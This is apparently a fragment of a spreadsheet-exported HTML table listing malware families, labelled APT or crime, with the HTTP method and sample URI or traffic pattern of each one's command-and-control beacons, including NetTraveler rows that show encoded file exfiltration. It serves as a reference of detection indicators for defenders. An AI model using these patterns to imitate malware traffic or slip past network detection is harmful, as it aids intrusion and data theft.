<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Mongal"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Mongal</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Murcy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Murcy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/150828"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/150828</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX &lt;very long string&gt; UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Netravler"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Netravler</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2," /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end\n /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc&hostip=10.12.0.23&filename= travlerbackinfo-2012-1-"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;"> /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end<br /> /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc&hostip=10.12.0.23&filename= travlerbackinfo-2012-1-</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NfLog"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NfLog</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/IElog/TestURL.asp HTTP/1.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/IElog/TestURL.asp HTTP/1.0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NfLog"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NfLog</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/NfLog/Nfile.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/NfLog/Nfile.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"NTESSESS"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">NTESSESS</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/6K8gL8.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/6K8gL8.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"PNG trojan"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">PNG trojan</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/index.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Poison Ivy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Poison Ivy</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"256 bytes of seemingly random data after a successful \nTCP handshake, then 48 byte \u201ckeep-alive\u201d requests"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">256 bytes of seemingly random data after a successful <br />TCP handshake, then 48 byte “keep-alive” requests</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RedOctober AuthInfo"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RedOctober AuthInfo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"http://%s:%s%s"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://%s:%s%s</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RedOctober Sysinfo"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RedOctober Sysinfo</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgi-bin/nt/sk"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/nt/sk</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"RegSubDat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">RegSubDat</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/5501000000/log"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/5501000000/log</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sanny / Win32.Daws"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sanny / Win32.Daws</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/write.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/write.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Seasalt"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Seasalt</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/postinfo.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/postinfo.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sofacy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sofacy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sofacy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sofacy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Srizbi"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Srizbi</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/cb_4.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cb_4.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Stabuniq"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Stabuniq</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/rssnews.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/rssnews.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Sykipot / Wyksol"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Sykipot / Wyksol</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/kys_allowget.asp?namegetkys.kys"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/kys_allowget.asp?namegetkys.kys</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Taidoor"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Taidoor</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/apzsr.php?id=021793111D309GE67E"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/apzsr.php?id=021793111D309GE67E</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tarsip Eclipse"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tarsip Eclipse</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Tarsip Moon"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tarsip Moon</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tbot tor"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tbot tor</span></td><td data-sheets-value="[null,2,"n"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">n</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tinba aka Zusy"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Tinba aka Zusy</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/h/index.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/h/index.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Vinself"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Vinself</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/w880/T19R17Q16/12010L11014"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/w880/T19R17Q16/12010L11014</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Vobfus"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Vobfus</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/XEuPCLrf?e"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/XEuPCLrf?e</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Bolid"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Bolid</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/firefox.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/firefox.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Clover"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Clover</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Default.asp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.asp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-CSON"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-CSON</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/Default.aspx?INDEX=<10_random_characters>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.aspx?INDEX=&lt;10_random_characters&gt;</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-CSON Response to commands"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-CSON Response to commands</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/Default.aspx?ID=IMNQRSSRXK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/Default.aspx?ID=IMNQRSSRXK</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-HEAD"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-HEAD</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"WEBC2-Table"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">WEBC2-Table</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/order.htm"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/order.htm</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Xpaj"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Xpaj</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Xtreme Rat"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Xtreme Rat</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/1234567890.functions"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/1234567890.functions</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zeus Gameover"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">Zeus Gameover</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/search.php?page=73a07bcb51f4be71"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/search.php?page=73a07bcb51f4be71</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"BitcoinMiner"]" style="padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">BitcoinMiner</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"{\"id\": 1, \"method\": \"mining.subscribe\", \"params\": [\"suckerrr/2.3.2\"]}"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">{"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]}</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Blazebot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Blazebot</span></td><td data-sheets-value="[null,2,"IRC"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">IRC</span></td><td data-sheets-value="[null,2,"NICK USA|94576\nUSER vtptdwd 0 0 :USA|94576"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">NICK USA|94576<br />USER vtptdwd 0 0 :USA|94576</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nurjax Adware"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nurjax Adware</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/services/rules.txt?dummy=916"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/services/rules.txt?dummy=916</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Tosct"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Tosct</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Nocpos"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Nocpos</span></td><td data-sheets-value="[null,2,"GET POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET POST</span></td><td data-sheets-value="[null,2,"/check/echo\n/check"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/check/echo<br />/check</span></td></tr>
